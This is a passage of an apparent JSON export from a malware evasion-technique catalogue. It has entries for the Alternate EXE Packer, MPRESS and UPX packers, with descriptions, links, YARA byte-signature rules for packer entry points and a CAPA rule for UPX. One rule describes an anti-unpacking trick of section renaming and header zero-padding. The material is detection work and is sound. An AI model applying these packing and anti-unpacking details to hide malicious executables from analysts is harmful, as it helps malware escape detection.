81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 74 28 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ExeStealth_WebToolMaster_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 185,
            "unprotect_id": "U1404",
            "name": "Alternate EXE Packer",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "Alternate EXE Packer compresses executable files (EXE) and DLL files; files it has already compressed can also be decompressed with the program. It offers 12 different compression levels and can create backups of the files that are to be compressed.\r\n\r\nCompressing a file reduces its physical size on the respective device. A compressed file decompresses itself when executed and can be run without this program. The program is freeware and requires the .NET Framework 2.0 (included in the operating system since Windows Vista).",
            "resources": "https://www.alternate-tools.com/pages/c_exepacker.php?lang=ENG",
            "tags": "packer",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 184,
            "unprotect_id": "U1403",
            "name": "MPRESS",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "MPRESS is a free packer. It makes programs and libraries smaller and decreases start-up time when the application is loaded from slow removable media or from the network.\r\n\r\nIt uses an in-place decompression technique, which decompresses the executable without memory overhead or other drawbacks; it also protects programs against reverse engineering by non-professional hackers. Programs compressed with MPRESS run exactly as before, with no runtime performance penalties.",
            "resources": "https://www.autohotkey.com/mpress/mpress_web.htm",
            "tags": "MPRESS",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 103,
                    "key": "yara_detect_mpress",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_MPRESS",
                    "rule": "rule MPRESS_V097_V099_MATCODE_Softwarenbsp_nbsp_SignByfly_20080416: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 49 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 28 AC 0A C0 74 23 8A C8 24 3F C1 E0 10 66 AD 80 E1 40 74 0F 8B D6 8B CF 03 F0 E8 60 00 00 00 03 F8 EB D8 8B C8 F3 A4 EB D2 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 69 FF FF FF B0 E9 AA B8 45 01 00 00 AB E8 00 00 00 00 58 05 A3 00 00 00 E9 93 00 00 00 53 56 57 8B F9 8B F2 8B DA 03 D8 51 55 33 C0 8B EB 8B DE 2B D2 2B C9 EB 4F 3B DD 73 6C 2B C9 66 8B 03 8D 5B 02 8A CC 80 E4 0F 0B C0 75 02 B4 10 C0 E9 04 80 C1 03 80 F9 12 72 19 8A 0B 66 83 C1 12 43 66 81 F9 11 01 72 0B 66 8B 0B 81 C1 11 01 00 00 43 43 8B F7 2B F0 F3 A4 12 D2 74 0A 72 B9 8A 03 43 88 07 47 EB F2 3B DD 73 1D 0A 13 F9 74 03 43 EB E6 8B 43 01 89 07 8B 43 05 89 47 04 8D 5B 09 8D 7F 08 33 C0 EB DF 5D 8B C7 59 2B C1 5F 5E 5B C3 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V107_V125_MATCODE_Softwarenbsp_nbsp_SignByfly_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 9E 02 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 9A 02 00 00 AB E8 00 00 00 00 58 05 1C 02 00 00 E9 0C 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V107_V125_MATCODE_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 9E 02 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B 
C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 9A 02 00 00 AB E8 00 00 00 00 58 05 1C 02 00 00 E9 0C 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V200_V20X_MATCODE_Software_20090423: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 ?? ?? ?? ?? 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 88 04 31 75 F6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V085_V092_MATCODE_Softwarenbsp_nbsp_SignByfly_20080414: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 48 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 28 AC 0A C0 74 23 8A C8 24 3F C1 E0 10 66 AD 80 E1 40 74 0F 8B D6 8B CF 03 F0 E8 5F 00 00 00 03 F8 EB D8 8B C8 F3 A4 EB D2 5E 5A 83 EA 05 2B C9 3B CA 73 25 8B D9 AC 41 24 FE 3C E8 75 F2 83 C1 04 AD 0B C0 78 06 3B C2 73 E6 EB 06 03 C3 78 E0 03 C2 2B C3 89 46 FC EB D7 E8 00 00 00 00 5F 81 C7 6A FF FF FF B0 E9 AA B8 44 01 00 00 AB E8 00 00 00 00 58 05 A3 00 00 00 E9 93 00 00 00 53 56 57 8B F9 8B F2 8B DA 03 D8 51 55 33 C0 8B EB 8B DE 2B D2 2B C9 EB 4F 3B DD 73 6C 2B C9 66 8B 03 8D 5B 02 8A CC 80 E4 0F 0B C0 75 02 B4 10 C0 E9 04 80 C1 03 80 F9 12 72 19 8A 0B 66 83 C1 12 43 66 81 F9 11 01 72 0B 66 8B 0B 81 C1 11 01 00 00 43 43 8B F7 2B F0 F3 A4 12 D2 74 0A 72 B9 8A 03 43 88 07 47 EB F2 3B DD 73 1D 0A 13 F9 74 03 43 EB E6 8B 43 01 89 07 8B 43 05 89 47 04 8D 5B 09 8D 7F 08 33 C0 EB DF 5D 8B C7 59 2B C1 5F 5E 5B C3 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V071a_V075b_MATCODE_Softwarenbsp_nbsp_SignByfly_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { 57 56 
53 51 52 55 E8 10 00 00 00 E8 7A 00 00 00 5D 5A 59 5B 5E 5F E9 84 01 00 00 E8 00 00 00 00 58 05 84 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 AD 2B C8 03 F1 8B C8 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 AC 0A C0 74 37 8A C8 24 3F 80 E1 C0 C1 E0 10 66 AD 80 F9 C0 74 1E F6 C1 40 75 0A 8B C8 2B C0 F3 AA 75 FC EB D9 8B D6 8B CF 03 F0 E8 8F 00 00 00 03 F8 EB CA 8B C8 F3 A4 75 FC EB C2 C3 E8 00 00 00 00 5F 81 C7 71 FF FF FF B0 E9 AA B8 9A 01 00 00 AB 2B FF E8 00 00 00 00 58 05 FE 00 00 00 8B 78 08 8B D7 8B 78 04 0B FF 74 53 8B 30 03 F0 2B F2 8B EE 8B C2 8B 45 3C 03 C5 8B 48 34 2B CD 74 3D E8 00 00 00 00 58 05 DD 00 00 00 8B 10 03 F2 03 FE 2B C0 AD 3B F7 73 25 8B D8 AD 3B F7 73 1E 8B D0 83 EA 08 03 D6 66 AD 0A E4 74 0B 25 FF 0F 00 00 03 C3 03 C5 29 08 3B F2 73 D8 EB E9 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V097_V099_MATCODE_Software_20080416: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 49 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 28 AC 0A C0 74 23 8A C8 24 3F C1 E0 10 66 AD 80 E1 40 74 0F 8B D6 8B CF 03 F0 E8 60 00 00 00 03 F8 EB D8 8B C8 F3 A4 EB D2 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 69 FF FF FF B0 E9 AA B8 45 01 00 00 AB E8 00 00 00 00 58 05 A3 00 00 00 E9 93 00 00 00 53 56 57 8B F9 8B F2 8B DA 03 D8 51 55 33 C0 8B EB 8B DE 2B D2 2B C9 EB 4F 3B DD 73 6C 2B C9 66 8B 03 8D 5B 02 8A CC 80 E4 0F 0B C0 75 02 B4 10 C0 E9 04 80 C1 03 80 F9 12 72 19 8A 0B 66 83 C1 12 43 66 81 F9 11 01 72 0B 66 8B 0B 81 C1 11 01 00 00 43 43 8B F7 2B F0 F3 A4 12 D2 74 0A 72 B9 8A 03 43 88 07 47 EB F2 3B DD 73 1D 0A 13 F9 74 03 43 EB E6 8B 43 01 89 07 8B 43 05 89 47 04 8D 5B 09 8D 7F 08 33 C0 EB DF 5D 8B C7 59 2B C1 5F 5E 5B C3 E9 }\r\n    condition:\r\n        $a at 
pe.entry_point\r\n\r\n}\r\nrule MPRESS_V085_V092_MATCODE_Software_20080414: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 48 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 28 AC 0A C0 74 23 8A C8 24 3F C1 E0 10 66 AD 80 E1 40 74 0F 8B D6 8B CF 03 F0 E8 5F 00 00 00 03 F8 EB D8 8B C8 F3 A4 EB D2 5E 5A 83 EA 05 2B C9 3B CA 73 25 8B D9 AC 41 24 FE 3C E8 75 F2 83 C1 04 AD 0B C0 78 06 3B C2 73 E6 EB 06 03 C3 78 E0 03 C2 2B C3 89 46 FC EB D7 E8 00 00 00 00 5F 81 C7 6A FF FF FF B0 E9 AA B8 44 01 00 00 AB E8 00 00 00 00 58 05 A3 00 00 00 E9 93 00 00 00 53 56 57 8B F9 8B F2 8B DA 03 D8 51 55 33 C0 8B EB 8B DE 2B D2 2B C9 EB 4F 3B DD 73 6C 2B C9 66 8B 03 8D 5B 02 8A CC 80 E4 0F 0B C0 75 02 B4 10 C0 E9 04 80 C1 03 80 F9 12 72 19 8A 0B 66 83 C1 12 43 66 81 F9 11 01 72 0B 66 8B 0B 81 C1 11 01 00 00 43 43 8B F7 2B F0 F3 A4 12 D2 74 0A 72 B9 8A 03 43 88 07 47 EB F2 3B DD 73 1D 0A 13 F9 74 03 43 EB E6 8B 43 01 89 07 8B 43 05 89 47 04 8D 5B 09 8D 7F 08 33 C0 EB DF 5D 8B C7 59 2B C1 5F 5E 5B C3 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V077b_MATCODE_Softwarenbsp_nbsp_SignByfly_20080313: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 0B 00 00 00 E8 77 00 00 00 61 E9 75 01 00 00 E8 00 00 00 00 58 05 75 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 AD 2B C8 03 F1 8B C8 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 3A AC 0A C0 74 35 8A C8 24 3F 80 E1 C0 C1 E0 10 66 AD 80 F9 C0 74 1C F6 C1 40 75 08 8B C8 2B C0 F3 AA EB D7 8B D6 8B CF 03 F0 E8 7E 00 00 00 03 F8 EB C8 8B C8 F3 A4 75 FC EB C0 C3 E8 00 00 00 00 5F 81 C7 79 FF FF FF B0 E9 AA B8 81 01 00 00 AB 2B FF E8 00 00 00 00 58 05 ED 00 00 00 8B 78 08 8B D7 8B 78 04 0B FF 74 42 8B 30 03 F0 2B F2 8B EE 8B 48 10 2B CD 74 33 8B 50 0C 03 F2 03 FE 2B C0 AD 3B F7 73 25 8B D8 AD 3B F7 73 1E 8B D0 83 EA 08 03 D6 66 AD 0A E4 74 0B 25 FF 0F 00 00 03 C3 03 C5 29 08 3B F2 73 
D8 EB E9 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V101_MATCODE_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 ?? ?? ?? ?? 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 B2 02 00 00 AB E8 00 00 00 00 58 05 34 02 00 00 E9 24 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V071a_V075b_MATCODE_Software_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { 57 56 53 51 52 55 E8 10 00 00 00 E8 7A 00 00 00 5D 5A 59 5B 5E 5F E9 84 01 00 00 E8 00 00 00 00 58 05 84 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 AD 2B C8 03 F1 8B C8 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 AC 0A C0 74 37 8A C8 24 3F 80 E1 C0 C1 E0 10 66 AD 80 F9 C0 74 1E F6 C1 40 75 0A 8B C8 2B C0 F3 AA 75 FC EB D9 8B D6 8B CF 03 F0 E8 8F 00 00 00 03 F8 EB CA 8B C8 F3 A4 75 FC EB C2 C3 E8 00 00 00 00 5F 81 C7 71 FF FF FF B0 E9 AA B8 9A 01 00 00 AB 2B FF E8 00 00 00 00 58 05 FE 00 00 00 8B 78 08 8B D7 8B 78 04 0B FF 74 53 8B 30 03 F0 2B F2 8B EE 8B C2 8B 45 3C 03 C5 8B 48 34 2B CD 74 3D E8 00 00 00 00 58 05 DD 00 00 00 8B 10 03 F2 03 FE 2B C0 AD 3B F7 73 25 8B D8 AD 3B F7 73 1E 8B D0 83 EA 08 03 D6 66 AD 0A E4 74 0B 25 FF 0F 00 00 03 C3 03 C5 29 08 3B F2 73 D8 EB E9 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V077b_MATCODE_Software_20080313: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 0B 00 00 00 E8 77 00 00 00 61 E9 75 01 00 00 E8 00 00 00 00 58 05 75 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 AD 2B C8 03 F1 8B C8 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 3A AC 0A C0 74 35 8A C8 24 3F 80 E1 C0 C1 E0 10 66 AD 80 F9 C0 74 1C 
F6 C1 40 75 08 8B C8 2B C0 F3 AA EB D7 8B D6 8B CF 03 F0 E8 7E 00 00 00 03 F8 EB C8 8B C8 F3 A4 75 FC EB C0 C3 E8 00 00 00 00 5F 81 C7 79 FF FF FF B0 E9 AA B8 81 01 00 00 AB 2B FF E8 00 00 00 00 58 05 ED 00 00 00 8B 78 08 8B D7 8B 78 04 0B FF 74 42 8B 30 03 F0 2B F2 8B EE 8B 48 10 2B CD 74 33 8B 50 0C 03 F2 03 FE 2B C0 AD 3B F7 73 25 8B D8 AD 3B F7 73 1E 8B D0 83 EA 08 03 D6 66 AD 0A E4 74 0B 25 FF 0F 00 00 03 C3 03 C5 29 08 3B F2 73 D8 EB E9 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V107_V12X_MATCODE_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 9E 02 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 9A 02 00 00 AB E8 00 00 00 00 58 05 1C 02 00 00 E9 0C 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V101_MATCODE_Softwarenbsp_nbsp_SignByfly_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 ?? ?? ?? ?? 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 B2 02 00 00 AB E8 00 00 00 00 58 05 34 02 00 00 E9 24 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 183,
            "unprotect_id": "U1402",
            "name": "UPX: Ultimate Packer for Executables",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "UPX is a free, portable, extendable, high-performance executable packer for several executable formats.",
            "resources": "https://en.wikipedia.org/wiki/UPX\r\nhttps://upx.github.io/",
            "tags": "upx",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 50,
                    "key": "yara_packer_antiunpack",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_PACKER_antiunpack",
                    "rule": "rule upx_antiunpack_pe {\r\n     meta:\r\n        description = \"Anti-UPX Unpacking technique about section renaming and zero padding against upx reference structure\"\r\n        author = \"hackeT\"\r\n\r\n    strings:\r\n        $mz = \"MZ\"\r\n\r\n        $upx0 = {55 50 58 30 00 00 00}  //section name UPX0\r\n        $upx1 = {55 50 58 31 00 00 00}  //section name UPX1\r\n        $upx_sig = \"UPX!\"               //UPX_MAGIC_LE32\r\n        $upx_sig2 = {A1 D8 D0 D5}       //UPX_MAGIC2_LE32\r\n        $zero = {00 00 00 00}\r\n\r\n    condition:\r\n        $mz at 0 and ( $upx_sig at 992 or $upx_sig2 at 992 )\r\n        and \r\n        ( \r\n          not ($upx0 in (248..984) or $upx1 in (248..984)) // section renaming: 248 is the minimum offset after pe optional header.\r\n        or \r\n          $zero in (992..1024)                             // zero padding against upx reference structure: pe header ends offset 1024.\r\n        )\r\n}"
                },
                {
                    "id": 94,
                    "key": "capa_detect_upx",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_UPX",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with UPX\r\n    namespace: anti-analysis/packer/upx\r\n    authors:\r\n      - william.ballenthin@mandiant.com\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing::UPX [F0001.008]\r\n    examples:\r\n      - CD2CBA9E6313E8DF2C1273593E649682\r\n      - Practical Malware Analysis Lab 01-02.exe_:0x0401000\r\n  features:\r\n    - or:\r\n      - and:\r\n        - format: pe\r\n        - or:\r\n          - section: UPX0\r\n          - section: UPX1\r\n      - and:\r\n        - format: elf\r\n        - or:\r\n          - string: \"UPX!\""
                },
                {
                    "id": 102,
                    "key": "yara_detect_upx",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_UPX",
                    "rule": "rule UPX_v30_EXE_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 57 83 C3 04 53 68 ?? ?? ?? 00 56 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8D ?? ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC 2E ?? ?? ?? ?? 73 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_020_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 AF AD 0E 0E 0E 06 1F 07 16 68 00 00 BD FF FF F7 E1 93 CB 55 50 58 21 03 03 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_2: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_302: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_RC_v1x: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n        $b = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 
00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 
